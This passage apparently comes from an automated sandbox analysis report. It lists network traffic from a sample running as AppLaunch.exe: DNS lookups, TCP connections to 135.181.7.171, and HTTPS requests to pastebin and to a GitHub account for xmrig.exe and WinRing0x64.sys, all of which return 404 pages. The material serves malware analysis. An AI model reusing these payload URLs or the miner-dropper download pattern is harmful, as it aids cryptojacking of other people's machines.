                                Sep 5, 2024 01:46:22.952600002 CEST8149750135.181.7.171192.168.2.4
                                Sep 5, 2024 01:46:22.952687979 CEST4975081192.168.2.4135.181.7.171
                                Sep 5, 2024 01:46:22.952986002 CEST4975081192.168.2.4135.181.7.171
                                Sep 5, 2024 01:46:27.961697102 CEST4975281192.168.2.4135.181.7.171
                                Sep 5, 2024 01:46:27.966640949 CEST8149752135.181.7.171192.168.2.4
                                Sep 5, 2024 01:46:27.966725111 CEST4975281192.168.2.4135.181.7.171
                                Sep 5, 2024 01:46:27.966960907 CEST4975281192.168.2.4135.181.7.171
                                Sep 5, 2024 01:46:27.971683979 CEST8149752135.181.7.171192.168.2.4
                                Sep 5, 2024 01:46:49.359129906 CEST8149752135.181.7.171192.168.2.4
                                Sep 5, 2024 01:46:49.359239101 CEST4975281192.168.2.4135.181.7.171
                                Sep 5, 2024 01:46:49.359764099 CEST4975281192.168.2.4135.181.7.171
                                Sep 5, 2024 01:46:54.368041992 CEST4975381192.168.2.4135.181.7.171
                                Sep 5, 2024 01:46:54.374125957 CEST8149753135.181.7.171192.168.2.4
                                Sep 5, 2024 01:46:54.374207020 CEST4975381192.168.2.4135.181.7.171
                                Sep 5, 2024 01:46:54.375051022 CEST4975381192.168.2.4135.181.7.171
                                Sep 5, 2024 01:46:54.384489059 CEST8149753135.181.7.171192.168.2.4
                                Sep 5, 2024 01:47:15.761432886 CEST8149753135.181.7.171192.168.2.4
                                Sep 5, 2024 01:47:15.761509895 CEST4975381192.168.2.4135.181.7.171
                                Sep 5, 2024 01:47:15.764451027 CEST4975381192.168.2.4135.181.7.171
                                Sep 5, 2024 01:47:20.774312973 CEST4975481192.168.2.4135.181.7.171
                                Sep 5, 2024 01:47:20.779335022 CEST8149754135.181.7.171192.168.2.4
                                Sep 5, 2024 01:47:20.779417992 CEST4975481192.168.2.4135.181.7.171
                                Sep 5, 2024 01:47:20.780208111 CEST4975481192.168.2.4135.181.7.171
                                Sep 5, 2024 01:47:20.786207914 CEST8149754135.181.7.171192.168.2.4

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Sep 5, 2024 01:45:42.536009073 CEST5260353192.168.2.41.1.1.1
                                Sep 5, 2024 01:45:42.542614937 CEST53526031.1.1.1192.168.2.4
                                Sep 5, 2024 01:45:43.608691931 CEST5666253192.168.2.41.1.1.1
                                Sep 5, 2024 01:45:43.615386963 CEST53566621.1.1.1192.168.2.4

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Sep 5, 2024 01:45:42.536009073 CEST192.168.2.41.1.1.10xb628Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                                Sep 5, 2024 01:45:43.608691931 CEST192.168.2.41.1.1.10xc15cStandard query (0)github.comA (IP address)IN (0x0001)false

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Sep 5, 2024 01:45:42.542614937 CEST1.1.1.1192.168.2.40xb628No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                Sep 5, 2024 01:45:42.542614937 CEST1.1.1.1192.168.2.40xb628No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                Sep 5, 2024 01:45:42.542614937 CEST1.1.1.1192.168.2.40xb628No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                Sep 5, 2024 01:45:43.615386963 CEST1.1.1.1192.168.2.40xc15cNo error (0)github.com140.82.121.3A (IP address)IN (0x0001)false

                                HTTP Request Dependency Graph

                                • pastebin.com
                                • github.com

                                HTTPS Proxied Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.449737172.67.19.24443104280C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                TimestampBytes transferredDirectionData
                                2024-09-04 23:45:43 UTC74OUTGET /raw/PTNbBX9V HTTP/1.1
                                Host: pastebin.com
                                Connection: Keep-Alive
                                2024-09-04 23:45:43 UTC445INHTTP/1.1 404 Not Found
                                Date: Wed, 04 Sep 2024 23:45:43 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                x-frame-options: DENY
                                x-frame-options: DENY
                                x-content-type-options: nosniff
                                x-content-type-options: nosniff
                                x-xss-protection: 1;mode=block
                                x-xss-protection: 1;mode=block
                                cache-control: public, max-age=1801
                                CF-Cache-Status: HIT
                                Age: 636
                                Server: cloudflare
                                CF-RAY: 8be1dad5ac6f7d1a-EWR
                                2024-09-04 23:45:43 UTC699INData Raw: 32 62 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 30 2e 37 35 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 79 65 73 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 73 74 65 62 69 6e 2e
                                Data Ascii: 2b4<!DOCTYPE html><html lang="en"><head> <meta name="viewport" content="width=device-width, initial-scale=0.75, maximum-scale=1.0, user-scalable=yes" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Pastebin.
                                2024-09-04 23:45:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.449739140.82.121.3443104280C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                TimestampBytes transferredDirectionData
                                2024-09-04 23:45:44 UTC95OUTGET /S1lentHash/xmrig/raw/main/xmrig.exe HTTP/1.1
                                Host: github.com
                                Connection: Keep-Alive
                                2024-09-04 23:45:44 UTC473INHTTP/1.1 404 Not Found
                                Server: GitHub.com
                                Date: Wed, 04 Sep 2024 23:45:44 GMT
                                Content-Type: text/html; charset=utf-8
                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                Cache-Control: no-cache
                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                X-Frame-Options: deny
                                X-Content-Type-Options: nosniff
                                X-XSS-Protection: 0
                                Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                                2024-09-04 23:45:44 UTC3310INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co
                                2024-09-04 23:45:44 UTC327INData Raw: 38 30 30 30 0d 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 0a 20 20 6c 61 6e 67 3d 22 65 6e 22 0a 20 20 0a 20 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 0a 20 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 20 64 61 74 61 2d 61 31 31 79 2d 6c 69 6e 6b 2d 75 6e 64 65 72 6c 69 6e 65 73 3d 22 74 72 75 65 22 0a 20 20 3e 0a 0a 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65
                                Data Ascii: 8000<!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system" data-a11y-link-underlines="true" > <head> <meta charset="utf-8"> <link rel="dns-pre
                                2024-09-04 23:45:44 UTC1370INData Raw: 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 76 61 74 61 72 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2d 63 6c 6f 75 64 2e 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 73 65 72 2d 69 6d 61 67 65 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65
                                Data Ascii: " href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubasse
                                2024-09-04 23:45:44 UTC1370INData Raw: 6e 74 72 61 73 74 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 6c 69 67 68 74 5f 68 69 67 68 5f 63 6f 6e 74 72 61 73 74 2d 66 64 35 34 39 39 38 34 38 39 38 35 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 5f 74 72 69 74 61 6e 6f 70 69 61 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66
                                Data Ascii: ntrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_high_contrast-fd5499848985.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href
                                2024-09-04 23:45:44 UTC1370INData Raw: 6f 6d 70 6c 65 74 69 6f 6e 5f 6e 65 77 5f 64 6f 6d 61 69 6e 22 2c 22 63 6f 70 69 6c 6f 74 5f 63 6f 6e 76 65 72 73 61 74 69 6f 6e 61 6c 5f 75 78 5f 68 69 73 74 6f 72 79 5f 72 65 66 73 22 2c 22 63 6f 70 69 6c 6f 74 5f 63 6f 70 79 5f 6d 65 73 73 61 67 65 22 2c 22 63 6f 70 69 6c 6f 74 5f 66 6f 6c 6c 6f 77 75 70 5f 74 6f 5f 61 67 65 6e 74 22 2c 22 63 6f 70 69 6c 6f 74 5f 69 6d 70 6c 69 63 69 74 5f 63 6f 6e 74 65 78 74 22 2c 22 63 6f 70 69 6c 6f 74 5f 73 6d 65 6c 6c 5f 69 63 65 62 72 65 61 6b 65 72 5f 75 78 22 2c 22 65 78 70 65 72 69 6d 65 6e 74 61 74 69 6f 6e 5f 61 7a 75 72 65 5f 76 61 72 69 61 6e 74 5f 65 6e 64 70 6f 69 6e 74 22 2c 22 66 61 69 6c 62 6f 74 5f 68 61 6e 64 6c 65 5f 6e 6f 6e 5f 65 72 72 6f 72 73 22 2c 22 67 65 6f 6a 73 6f 6e 5f 61 7a 75 72 65 5f
                                Data Ascii: ompletion_new_domain","copilot_conversational_ux_history_refs","copilot_copy_message","copilot_followup_to_agent","copilot_implicit_context","copilot_smell_icebreaker_ux","experimentation_azure_variant_endpoint","failbot_handle_non_errors","geojson_azure_
                                2024-09-04 23:45:44 UTC285INData Raw: 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 65 6e 76 69 72 6f 6e 6d 65 6e 74 2d 39 32 34 65 36 30 62 63 61 37 64 32 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f
                                Data Ascii: defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-924e60bca7d2.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_mo
                                2024-09-04 23:45:44 UTC1370INData Raw: 5f 64 69 73 74 5f 69 6e 64 65 78 5f 65 73 6d 5f 6a 73 2d 66 36 39 30 66 64 39 61 65 33 64 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 62 65 68 61 76 69 6f 72 73 5f 64 69 73 74 5f 65 73 6d 5f 66 6f 63 75 73 2d 7a 6f 6e 65 5f 6a 73 2d 63 39 30 38 36 61 34 66 62 36 32 62 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c
                                Data Ascii: _dist_index_esm_js-f690fd9ae3d5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_focus-zone_js-c9086a4fb62b.js"></script><
                                2024-09-04 23:45:44 UTC1370INData Raw: 2d 65 76 65 6e 74 73 5f 64 69 73 74 5f 69 6e 2d 33 65 66 64 61 33 2d 37 30 31 61 63 62 36 39 31 39 33 66 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 66 69 6c 74 65 72 2d 69 6e 70 75 74 2d 65 6c 65 6d 65 6e 74 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 72 65
                                Data Ascii: -events_dist_in-3efda3-701acb69193f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_re
                                2024-09-04 23:45:44 UTC1370INData Raw: 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 63 61 74 61 6c 79 73 74 5f 6c 69 62 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 68 79 64 72 6f 2d 61 6e 61 6c 79 74 69 63 73 2d 63 6c 69 65 6e 74 5f 2d 37 39 30 31 65 37 2d 64 63 38 38 35 38 37 63 31 34 65 64 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20
                                Data Ascii: script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_catalyst_lib_index_js-node_modules_github_hydro-analytics-client_-7901e7-dc88587c14ed.js"></script><script
                                2024-09-04 23:45:44 UTC1370INData Raw: 38 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 73 63 72 6f 6c 6c 2d 61 6e 63 68 6f 72 69 6e 67 5f 64 69 73 74 5f 73 63 72 6f 6c 6c 2d 61 6e 63 68 6f 72 69 6e 67 5f 65 73 6d 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 68 6f 74 6b 65 79 2d 31 61 31 64 39 31 2d 66 61 39 66 32 39 61 38 35 31 34 62 2e 6a 73 22 3e 3c
                                Data Ascii: 8.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_scroll-anchoring_dist_scroll-anchoring_esm_js-node_modules_github_hotkey-1a1d91-fa9f29a8514b.js"><


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                2192.168.2.449740140.82.121.3443104280C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                TimestampBytes transferredDirectionData
                                2024-09-04 23:45:44 UTC109OUTGET /S1lentHash/file_to_dwnld/raw/main/WinRing0x64.sys HTTP/1.1
                                Host: github.com
                                Connection: Keep-Alive
                                2024-09-04 23:45:44 UTC473INHTTP/1.1 404 Not Found
                                Server: GitHub.com
                                Date: Wed, 04 Sep 2024 23:45:44 GMT
                                Content-Type: text/html; charset=utf-8
                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                Cache-Control: no-cache
                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                X-Frame-Options: deny
                                X-Content-Type-Options: nosniff
                                X-XSS-Protection: 0
                                Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
                                2024-09-04 23:45:44 UTC3308INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co
                                2024-09-04 23:45:44 UTC329INData Raw: 38 30 30 30 0d 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 0a 20 20 6c 61 6e 67 3d 22 65 6e 22 0a 20 20 0a 20 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 0a 20 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 20 64 61 74 61 2d 61 31 31 79 2d 6c 69 6e 6b 2d 75 6e 64 65 72 6c 69 6e 65 73 3d 22 74 72 75 65 22 0a 20 20 3e 0a 0a 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65
                                Data Ascii: 8000<!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system" data-a11y-link-underlines="true" > <head> <meta charset="utf-8"> <link rel="dns-pre
                                2024-09-04 23:45:44 UTC1370INData Raw: 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 76 61 74 61 72 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2d 63 6c 6f 75 64 2e 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 73 65 72 2d 69 6d 61 67 65 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73
                                Data Ascii: href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets
                                2024-09-04 23:45:44 UTC1370INData Raw: 72 61 73 74 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 6c 69 67 68 74 5f 68 69 67 68 5f 63 6f 6e 74 72 61 73 74 2d 66 64 35 34 39 39 38 34 38 39 38 35 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 5f 74 72 69 74 61 6e 6f 70 69 61 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22
                                Data Ascii: rast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_high_contrast-fd5499848985.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="
                                2024-09-04 23:45:44 UTC1370INData Raw: 70 6c 65 74 69 6f 6e 5f 6e 65 77 5f 64 6f 6d 61 69 6e 22 2c 22 63 6f 70 69 6c 6f 74 5f 63 6f 6e 76 65 72 73 61 74 69 6f 6e 61 6c 5f 75 78 5f 68 69 73 74 6f 72 79 5f 72 65 66 73 22 2c 22 63 6f 70 69 6c 6f 74 5f 63 6f 70 79 5f 6d 65 73 73 61 67 65 22 2c 22 63 6f 70 69 6c 6f 74 5f 66 6f 6c 6c 6f 77 75 70 5f 74 6f 5f 61 67 65 6e 74 22 2c 22 63 6f 70 69 6c 6f 74 5f 69 6d 70 6c 69 63 69 74 5f 63 6f 6e 74 65 78 74 22 2c 22 63 6f 70 69 6c 6f 74 5f 73 6d 65 6c 6c 5f 69 63 65 62 72 65 61 6b 65 72 5f 75 78 22 2c 22 65 78 70 65 72 69 6d 65 6e 74 61 74 69 6f 6e 5f 61 7a 75 72 65 5f 76 61 72 69 61 6e 74 5f 65 6e 64 70 6f 69 6e 74 22 2c 22 66 61 69 6c 62 6f 74 5f 68 61 6e 64 6c 65 5f 6e 6f 6e 5f 65 72 72 6f 72 73 22 2c 22 67 65 6f 6a 73 6f 6e 5f 61 7a 75 72 65 5f 6d 61
